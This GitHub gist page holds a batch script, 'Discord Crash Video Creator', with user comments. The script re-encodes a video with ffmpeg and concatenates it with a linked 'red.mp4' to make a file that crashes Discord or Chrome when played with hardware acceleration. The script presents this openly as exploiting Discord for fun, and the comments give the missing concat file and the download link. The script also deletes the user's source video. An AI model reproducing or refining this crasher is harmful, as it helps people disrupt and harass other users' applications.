-
-
Save Incognito-100/83e188f3160a5afcd49743e35c7c9d2b to your computer and use it in GitHub Desktop.
Discord Crash Video Creator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
title Discord Crash Video Creator | |
color c | |
echo ========================= NOTE ========================= | |
echo This script creates videos that crash Discord/Chrome. | |
echo Hardware acceleration must be enabled for it to work. | |
echo exploting discord is fun | |
echo. | |
echo ======================================================== | |
echo. | |
pause | |
WHERE ffmpeg | |
IF %ERRORLEVEL% NEQ 0 echo ffmpeg wasn't found. Please make sure it is installed correctly. && pause && exit | |
color 7 | |
cls | |
set /p filepath=Enter path to video file (or drag and drop the video here): | |
echo Changing video properties... | |
ffmpeg -i %filepath% -pix_fmt yuv422p Bunny2.mp4 | |
echo Creating output file... | |
ffmpeg -f concat -i test.txt -codec copy crasher.mp4 | |
del Bunny2.mp4 | |
del %filepath% | |
echo. | |
pause | |
@BKGstudios |
test.txt: Invalid data found when processing input
test.txt: Invalid data found when processing input
you need this in the test.txt file
file Bunny2.mp4
file red.mp4
and this video
https://www.mediafire.com/file/obe2gejp8xehd8s/red.mp4/file
yeah no its not working for me i make the test.txt file and then copy and paste file Bunny2.mp4
file red.mp4 but it does not work please help
plus i also donwload the ideo
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
fixed it and made it support any file name